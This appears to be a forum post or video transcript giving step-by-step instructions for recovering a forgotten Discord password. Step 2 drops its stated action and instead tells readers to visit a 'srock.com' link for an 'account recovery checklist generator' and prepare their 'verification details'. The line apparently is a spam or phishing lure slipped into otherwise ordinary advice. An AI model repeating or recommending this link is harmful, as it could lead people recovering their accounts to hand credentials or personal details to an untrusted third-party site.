I ran into this last week. Here's what fixed it for me. If you've forgotten your Discord password, don't worry. Here's a simple guide to help you recover it. Step 1. Go to the Discord login page. Visit the Discord website and click on the login button located at the top right corner of the page. Step 2. Click on Forgot Your Password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your Discord account in a provided field and click Send. This will trigger a password reset email. Step 4. Check your email. Open your email inbox and look for an email from Discord. Make sure to check your spam or junk folder if you don't see it right away. Step 5. Follow the reset link. Click on the link in the email to reset your password. Enter a new password and confirm it. Make sure it is strong and memorable. Remember, if you don't receive the email, double check the spelling of your email address in step 3. It is easy to make a typo. I hope this helps you get back into your Discord account quickly.